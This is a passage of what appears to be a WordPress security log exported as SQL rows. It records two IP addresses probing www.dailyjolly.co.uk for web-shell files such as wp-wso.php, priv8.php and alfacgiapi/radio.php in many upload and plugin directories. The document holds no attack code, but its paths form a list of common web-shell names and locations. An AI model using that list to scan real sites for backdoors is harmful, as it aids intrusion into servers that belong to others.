4Z7SYCf8jvanO','','19|0|0|0|www.dailyjolly.co.uk/y.php',0,19,0),('20.244.36.78',351544398,'',0,1674459277.8392,55,'oPynquzTs80efU1C5Zhi3gbQ','','19|0|0|0|www.dailyjolly.co.uk/u.php',0,19,0),('20.244.36.78',351544398,'',0,1674459278.7625,55,'8L6K4MnJyhvPsje0gufbxW19','','19|0|0|0|www.dailyjolly.co.uk/i.php',0,19,0),('20.244.36.78',351544398,'',0,1674459279.6502,55,'u0VtG7bfmygCMKHIABNDXrSY','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('20.244.36.78',351544398,'',0,1674459280.5466,55,'wgisdx5vNbZCRJ3YpT41cFMz','','19|0|0|0|www.dailyjolly.co.uk/p.php',0,19,0),('20.244.36.78',351544398,'',0,1674459281.4371,55,'IJ9hcLTtWYBUNjCMSVKZ6o0y','','19|0|0|0|www.dailyjolly.co.uk/q.php',0,19,0),('20.244.36.78',351544398,'',0,1674459282.3506,55,'OdxjPDVnv2maA1zUH7IrQtip','','19|0|0|0|www.dailyjolly.co.uk/s.php',0,19,0),('20.244.36.78',351544398,'',0,1674459283.2197,55,'QIdmgTD8pCXznHWJFsiwePLB','','19|0|0|0|www.dailyjolly.co.uk/d.php',0,19,0),('20.244.36.78',351544398,'',0,1674459284.1315,55,'n4bJk0ETVpA5xdrByOLGPsqS','','19|0|0|0|www.dailyjolly.co.uk/f.php',0,19,0),('20.244.36.78',351544398,'',0,1674459285.0667,55,'XKEQ4rf1iA06Dgl9h3z5ujNa','','19|0|0|0|www.dailyjolly.co.uk/g.php',0,19,0),('20.244.36.78',351544398,'',0,1674459285.9804,55,'nMPjwisENWSDLuCVTQ1khUoe','','19|0|0|0|www.dailyjolly.co.uk/h.php',0,19,0),('20.244.36.78',351544398,'',0,1674459286.8416,55,'juZDCfQS6gIqYM4BKlJpVF7T','','19|0|0|0|www.dailyjolly.co.uk/j.php',0,19,0),('20.244.36.78',351544398,'',0,1674459287.7365,55,'XaT15hQKtHjli8ERnOLCvrkS','','19|0|0|0|www.dailyjolly.co.uk/k.php',0,19,0),('20.244.36.78',351544398,'',0,1674459288.6241,55,'sWHjN6CV9bzBAqoZRntvKglG','','19|0|0|0|www.dailyjolly.co.uk/l.php',0,19,0),('20.244.36.78',351544398,'',0,1674459289.5054,55,'20hauMgyzVlAPRYHUDnf5ZXw','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('20.244.36.78',351544398,'',0,1674459290.3739,55,'T7a89Wu5HBciyjQlDVF6fEKA','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('20.244.36.78',351544398,'',0,1674459291.2581,55,'nXLK6xsYOJl7e4VUzSZdgbow','','19|0|0|0|www.dailyjolly.co.uk/v.php',0,19,0),('20.244.36.78',351544398,'',0,1674459292.1409,55,'vEe9b1TU4qa07POBtFcHIxLM','','19|0|0|0|www.dailyjolly.co.uk/n.php',0,19,0),('20.244.36.78',351544398,'',0,1674459293.0088,55,'spiMLAchGVk3XSd0PWTafujB','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('20.244.36.78',351544398,'',0,1674459293.8794,55,'Cvz9JDeHUnNh1RuTOBk53pGQ','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('20.244.36.78',351544398,'',0,1674459294.7521,55,'EUGas8cIY5pHdD7vSRPijK4u','','19|0|0|0|www.dailyjolly.co.uk/wp-wso.php',0,19,0),('20.244.36.78',351544398,'',0,1674459295.6648,55,'qty85O14NbhKp2JB3FGHTvfi','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('20.244.36.78',351544398,'',0,1674459296.5263,55,'GnqaIvk3OXpRM5xseT4yBZWl','','19|0|0|0|www.dailyjolly.co.uk/minimo.php',0,19,0),('20.244.36.78',351544398,'',0,1674459297.3811,55,'diJ4oeI60VRjGTtwASOPu7EQ','','19|0|0|0|www.dailyjolly.co.uk/V3.php',0,19,0),('20.244.36.78',351544398,'',0,1674459298.3235,55,'ZX2LnuloQG90Kc6Ih7vPbpqO','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('20.244.36.78',351544398,'',0,1674459299.1848,55,'EgerGJU8S5bNWROkdF4BMP6h','','19|0|0|0|www.dailyjolly.co.uk/www.php',0,19,0),('20.244.36.78',351544398,'',0,1674459300.0762,55,'vcgO3G0C7yZK1kPFQIoaDx8m','','19|0|0|0|www.dailyjolly.co.uk/100.php',0,19,0),('20.244.36.78',351544398,'',0,1674459300.9536,55,'Hz4UEymWGDaAlB0L81VPKMYw','','19|0|0|0|www.dailyjolly.co.uk/777.php',0,19,0),('20.244.36.78',351544398,'',0,1674459301.9089,55,'sknIel9PrCd3qXGL47DxhoB2','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.244.36.78',351544398,'',0,1674459302.8494,55,'7nGkgaR5lKiwHFUOxNsmV0S9','','19|0|0|0|www.dailyjolly.co.uk/xox.php',0,19,0),('20.244.36.78',351544398,'',0,1674459303.7429,55,'xZoJSFkapYeX7lB8tW09b31i','','19|0|0|0|www.dailyjolly.co.uk/new.php',0,19,0),('20.244.36.78',351544398,'',0,1674459304.6211,55,'8AZEgQJDkOzNp2YVx5mF7efn','','19|0|0|0|www.dailyjolly.co.uk/wi.php',0,19,0),('20.244.36.78',351544398,'',0,1674459305.4953,55,'9o3ObhW1GXZ62LYusBUDTwpm','','19|0|0|0|www.dailyjolly.co.uk/mar.php',0,19,0),('20.244.36.78',351544398,'',0,1674459306.3619,55,'Ll6iBCsM3SPIQHUjptVdkGR4','','19|0|0|0|www.dailyjolly.co.uk/root.php',0,19,0),('20.244.36.78',351544398,'',0,1674459307.2297,55,'WtKQCoYxBp5IysgJjk9SUd4F','','19|0|0|0|www.dailyjolly.co.uk/nee.php',0,19,0),('20.244.36.78',351544398,'',0,1674459308.1217,55,'rRZj0fCLQ95qxTt4UiucklO3','','19|0|0|0|www.dailyjolly.co.uk/ws.php',0,19,0),('20.244.36.78',351544398,'',0,1674459309.0323,55,'bXJnLY3ZMElVg9S1vR785rWm','','19|0|0|0|www.dailyjolly.co.uk/lol.php',0,19,0),('20.244.36.78',351544398,'',0,1674459309.9400,55,'gD9HP1ftscuk5AK3IjQnXM0Y','','19|0|0|0|www.dailyjolly.co.uk/87.php',0,19,0),('20.244.36.78',351544398,'',0,1674459310.8611,55,'LAmGRlKrySb2vTOt1JidVB0f','','19|0|0|0|www.dailyjolly.co.uk/7yn.php',0,19,0),('20.244.36.78',351544398,'',0,1674459311.7829,55,'WTkwP1L3OYraSsqtVMnXfxKi','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('20.244.36.78',351544398,'',0,1674459312.7125,55,'hk10A8jqZXaBJRI2USbrMEwF','','19|0|0|0|www.dailyjolly.co.uk/13.php',0,19,0),('20.244.36.78',351544398,'',0,1674459313.5875,55,'xjW9q5OzZoHvGsSi76aFQP0c','','19|0|0|0|www.dailyjolly.co.uk/FoxWSOv1.php',0,19,0),('20.244.36.78',351544398,'',0,1674459314.4674,55,'XKumxV7yT35grevztk8op4Ea','','19|0|0|0|www.dailyjolly.co.uk/alf.php',0,19,0),('20.244.36.78',351544398,'',0,1674459315.3910,55,'h8RkXtKZAJ7nsCW9eojD3LiV','','19|0|0|0|www.dailyjolly.co.uk/bb.php',0,19,0),('20.244.36.78',351544398,'',0,1674459316.2658,55,'PsQ53wmGV6HDvqMbST4RuOZl','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('20.244.36.78',351544398,'',0,1674459317.1332,55,'InfKwo9DZN7dCgPzMkXbSrmR','','19|0|0|0|www.dailyjolly.co.uk/WSO.php',0,19,0),('20.244.36.78',351544398,'',0,1674459318.0224,55,'4NkhGmP8wjtSoKdErQuYXBli','','19|0|0|0|www.dailyjolly.co.uk/hello.php',0,19,0),('20.244.36.78',351544398,'',0,1674459318.8931,55,'y4rRDqauet35zMCfEIiUjlO6','','19|0|0|0|www.dailyjolly.co.uk/if.php',0,19,0),('20.244.36.78',351544398,'',0,1674459319.7717,55,'1v4QYjIgWuCfNMbdpz6F5ZBG','','19|0|0|0|www.dailyjolly.co.uk/kk.php',0,19,0),('20.244.36.78',351544398,'',0,1674459320.6462,55,'T5yX3hJzqfuCm8wxisprnlja','','19|0|0|0|www.dailyjolly.co.uk/mrjn.php',0,19,0),('20.244.36.78',351544398,'',0,1674459321.5640,55,'4Gmua2UDMkKbc8RvpAgBf6rV','','19|0|0|0|www.dailyjolly.co.uk/kn.php',0,19,0),('20.244.36.78',351544398,'',0,1674459322.4397,55,'dpW6J5SqH02YivykVwjzMlsK','','19|0|0|0|www.dailyjolly.co.uk/3301.php',0,19,0),('20.244.36.78',351544398,'',0,1674459323.3209,55,'Ih7pH8oClxgAraj1yPGU6cBb','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('20.244.36.78',351544398,'',0,1674459324.2507,55,'NKRGbAgPJpnVakxOMIT1QYzw','','19|0|0|0|www.dailyjolly.co.uk/alex.php',0,19,0),('20.244.36.78',351544398,'',0,1674459325.1266,55,'L1cslwakXyi0Yj3M4EW5v9eo','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('20.244.36.78',351544398,'',0,1674459325.9959,55,'XjMF37lzbZ5ICnuy9SqOfxwd','','19|0|0|0|www.dailyjolly.co.uk/anone.php',0,19,0),('20.244.36.78',351544398,'',0,1674459326.9053,55,'GCztKi3WpYwMd58UfalsT9c1','','19|0|0|0|www.dailyjolly.co.uk/wp-configer.php',0,19,0),('20.244.36.78',351544398,'',0,1674459327.7781,55,'SZjYHTR8iWOArsBoNufQtKkD','','19|0|0|0|www.dailyjolly.co.uk/wp-ad.php',0,19,0),('20.244.36.78',351544398,'',0,1674459328.6389,55,'vUdha3oyC0jpmTrBRz5kHM2b','','19|0|0|0|www.dailyjolly.co.uk/send.php',0,19,0),('20.244.36.78',351544398,'',0,1674459329.5128,55,'eolQ4SXiLPgszYyp3UEmdDf6','','19|0|0|0|www.dailyjolly.co.uk/.wp-cache.php',0,19,0),('20.244.36.78',351544398,'',0,1674459330.3906,55,'GCwNLWDFlVKMpXqRr94vbt1s','','19|0|0|0|www.dailyjolly.co.uk/sendmail.php',0,19,0),('20.244.36.78',351544398,'',0,1674459331.3379,55,'Mo3ah7irjCpWBHIF1vJ6qlQy','','19|0|0|0|www.dailyjolly.co.uk/rahma.php',0,19,0),('20.244.36.78',351544398,'',0,1674459332.2090,55,'EI6rtqe0gXGAFHzRNBW1pLJb','','19|0|0|0|www.dailyjolly.co.uk/nasgor.php',0,19,0),('20.244.36.78',351544398,'',0,1674459333.0928,55,'NCfe5odyhTjKYw6HsF9g1R48','','19|0|0|0|www.dailyjolly.co.uk/wp-confirm.php',0,19,0),('20.244.36.78',351544398,'',0,1674459333.9801,55,'Q3anGfmAVXrJqYMsv14IkeOu','','19|0|0|0|www.dailyjolly.co.uk/alfa123.php',0,19,0),('20.244.36.78',351544398,'',0,1674459334.9156,55,'AUNP6bh7YSg0uwLj4JBRroy2','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('20.244.36.78',351544398,'',0,1674459335.8100,55,'OQrB6DU8Z3aEizvoYI7wqn9V','','19|0|0|0|www.dailyjolly.co.uk/bypass.php',0,19,0),('20.244.36.78',351544398,'',0,1674459336.6844,55,'X4xLBeVv6WOKlmAb31pPhJn8','','19|0|0|0|www.dailyjolly.co.uk/wp-one.php',0,19,0),('20.244.36.78',351544398,'',0,1674459337.5823,55,'OvSDcXfE4zT8HBaAelPUKZo2','','19|0|0|0|www.dailyjolly.co.uk/alexus.php',0,19,0),('20.244.36.78',351544398,'',0,1674459338.4753,55,'beRIF12kadV4Tz5tXvDKPGiW','','19|0|0|0|www.dailyjolly.co.uk/wso1337.php',0,19,0),('35.183.107.9',599223049,'',0,1674474091.7089,55,'MgXTorZCkWc73BP8RNjHnpi1','','19|0|0|0|www.dailyjolly.co.uk/alfacgiapi/index.php',0,19,0),('35.183.107.9',599223049,'',0,1674474092.1332,55,'SYm46N3qPgLba5rFZxQUVpef','','19|0|0|0|www.dailyjolly.co.uk/alfacgiapi/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674474092.5413,55,'srblB7hefXZi2gSy9ADzNUxp','','19|0|0|0|www.dailyjolly.co.uk/alfacgiapi/404.php',0,19,0),('35.183.107.9',599223049,'',0,1674474096.4137,55,'zT3Vc0HKXUlCZPMhOpGm5896','','19|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/index.php',0,19,0),('35.183.107.9',599223049,'',0,1674474096.9805,55,'wFhI9xBZ6CcOD8JvqaTpjdGm','','19|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674474097.0699,10,'wFhI9xBZ6CcOD8JvqaTpjdGm','','707|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/radio.php',0,707,0),('35.183.107.9',599223049,'',0,1674474097.4871,100,'myh6Vq3wvlN1ckuHT92Go8SF','','13|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474101.7220,100,'2jFN93Hlu6vGBsUoyeAhrdxK','','13|0|0|0|www.dailyjolly.co.uk/assets/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474102.2102,100,'lfd8R3iXEAJxtVpbqmzCPn1r','','13|0|0|0|www.dailyjolly.co.uk/assets/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474102.6004,100,'cqL1FKuUnxQ4dkVlWv7ibGmj','','13|0|0|0|www.dailyjolly.co.uk/assets/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474107.9716,100,'GWiEXkh279NaUOPbZLQevuJY','','13|0|0|0|www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474108.3871,100,'BxiCMVldZqLJ7UvXnoYahg2w','','13|0|0|0|www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474108.8281,100,'k8rsLBb5JM47z9h2vidZuDWX','','13|0|0|0|www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474113.7151,100,'TkGitg57vfaCeW3hOIQZcXwD','','13|0|0|0|www.dailyjolly.co.uk/upload/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474114.1269,100,'l8ZzfPNsrC06QOk9qHpiGD2A','','13|0|0|0|www.dailyjolly.co.uk/upload/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474114.5061,100,'zouXZEdW56URLl1VgTAhQCGM','','13|0|0|0|www.dailyjolly.co.uk/upload/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474119.5198,100,'L7hI8XbjGT4FDd3ziomkPEtl','','13|0|0|0|www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474119.9166,100,'kHs6iv5uIdF3BJtcWEARKeL4','','13|0|0|0|www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474120.3206,100,'mW87KLpeldw03QM2aNHC164y','','13|0|0|0|www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474124.6190,100,'7lEdZkRmngi8bWvIPHDKcCSq','','13|0|0|0|www.dailyjolly.co.uk/uploads/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474125.0065,100,'8cDzhF1aBqZ26SxfL39ljtnk','','13|0|0|0|www.dailyjolly.co.uk/uploads/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474125.4138,100,'pPRKE5d2B8bOrSIJljo1QYh0','','13|0|0|0|www.dailyjolly.co.uk/uploads/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474130.1229,100,'Hg8QFfmVJrGSq2On0bNo4ABW','','13|0|0|0|www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474130.5968,100,'qJ2s6iBoU0vTewkGLXNuSIPz','','13|0|0|0|www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474131.0118,100,'uYT0EN38R4X2wPKHabvUcSWt','','13|0|0|0|www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474136.1146,100,'OZb0A8akmEzevBgF3iVKDljy','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474136.5608,100,'y2J7G9t53roTjecnp4MEPmDH','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474136.9280,100,'L978ronMXxWTH5is1lVKfZz4','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474140.8862,100,'dMto4yDN7UEV6pcR1ifkjABG','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474141.2948,100,'PK6aXjRQ7L3xWFBNprnlEtTv','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474141.6716,100,'bTrMwP3j5uXm8zAil09NdJHy','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474146.2937,100,'32uUbxtNXjLohDkT7yqawOZ0','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474146.7875,100,'vsFK2fdhDqglpZG4cz0mXUEO','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474147.2611,100,'KECM78eVuJrgtc1IfNkynaiH','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474151.9991,100,'bd0ZFOaYpszlmxS6X4K9VnGy','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474152.4732,100,'w01ORQrCPXbz8FjfkvGL9hgD','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474152.9980,100,'DOrMl4H8TIA3yJh6Rv1Bjup2','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474158.1640,100,'H7mZaMuYbEjDNof4qeT0WScw','','13|0|0|0|www.dailyjolly.co.uk/wp-content/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474158.6037,100,'VKyPWgZoaf2M9BUsleIGJqQH','','13|0|0|0|www.dailyjolly.co.uk/wp-content/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474159.0808,100,'TyJH1PKX4siwdGnOjAm6hNvb','','13|0|0|0|www.dailyjolly.co.uk/wp-content/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474163.0056,100,'vNB5frp07sZ3CEYlwISdizTe','','13|0|0|0|www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474163.3815,100,'zj9alrpFTSoyv1Jb68AfWwEs','','13|0|0|0|www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474163.7995,100,'pQyD3aRz2OFjHr0ALhnwPXJv','','13|0|0|0|www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474168.5521,100,'c6iIpUXeAzDL8Nhltuy5xEja','','13|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474169.1629,100,'m3aR45IQEPJ6b72jqTBwLct8','','13|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474169.6159,100,'xudsbRKryY96HUkzoG2QgjTS','','13|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474173.7389,100,'z6HB7JFiU52dx4M3KcnaG1RP','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474174.1345,100,'QatyGOpj0lYESvqhPTA1KUD4','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474174.5561,100,'rGkCKDUj4WHnQEeINbAq1MB6','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474178.6626,100,'b7gDpQHVFP1K4CqovW2mzBnI','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474179.1094,100,'tP0lgCr1DW6ObEFXB9yIz5u7','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474179.5338,100,'NBDl3nvjqPk7yzJdb9mILVpG','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474183.2257,100,'6OehDQbFTP8ZWK4mnSMj0lvo','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474183.6104,100,'8InPZLru67tWqSjewyXJDU1o','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474183.9618,100,'dE0l6fhgZpLIW75zNajvJQHT','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474187.9004,100,'7KXrdnWZBYM6CwPsgy8R1e2l','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474188.4062,100,'Hm9S0j5lZL8UidAFtvNYprIw','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474188.8970,100,'817i9TpxjBhASoQdM30sK6tJ','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474192.9522,100,'cWxFpZYE9tSlq5mVrUaAKz2w','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474193.3776,100,'IzsHE9Amr1ZaCkf2lwMFgPXx','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474193.8197,100,'BoGcNIt5sFMCX8SRlWAKpi0V','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474197.6962,100,'NyzkPMhvlewn0u5AJ7c8bXjI','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474198.1027,100,'HcjJYQGNRaquM6z0P81kVshO','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474198.5318,100,'43IA8oZGbCpFvKOMuSgEXUPd','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474202.7214,100,'AnVZqSJWxDcYOKU9MaQhdgl8','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474203.0926,100,'OqbpNT4tsMch2gLl6rJvFGzW','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474203.4420,100,'IiF6EJKYxgvbGeMrUWZdLHTk','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474210.1497,100,'sfELhBFwkXIo8ndJ65DKq7yR','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474210.5412,100,'1ugCB7zK3RbDhc9IJlQytdiO','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474210.9377,100,'NhB0T2kpVdPwCoO8z5aFviSc','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474215.4414,100,'ZwhmzMEuV190kC6A7oeYlfBb','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474215.8680,100,'PTFYs0SfZXDrQcb36vqJ9CdR','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474216.2340,100,'xvWyPYneNb9t3kC0lauwUJAi','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474221.0954,100,'KTS0uVmsQMFiERjnWlhp2D6q','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474221.5357,100,'6UF98IeVwiZThLE4doy7uqb5','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474222.0558,100,'4wI0RQr2KySkpUuDMdj9PLbe','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474226.4018,100,'un2vB9iCVkayE0lpqc5ZLx8X','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474226.7964,100,'oOwJPkqKmpirnHu2LN6cI0Dh','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474227.2497,100,'vFfnd4TiS6Lhy9W51tRHOr3C','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474232.2136,100,'M3ZC6PdrHt1NRngE28fqGzVI','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474232.5887,100,'XSnG4sjePEgqWVKYDmduzt29','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474233.0328,100,'EmRjcDikQw1aMZGthlzdPx7v','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474237.8211,100,'raUb2wf4YSMnVOxdkXBlzyeE','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474238.2544,100,'iR9TqLCg203mGK6csnZQJ7Oz','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474238.7193,100,'dEOqIvZT0C7tnHzuAFh19QKy','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474243.4877,100,'SnkYzDT3Bu4Jml7iAsL5togI','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474243.8562,100,'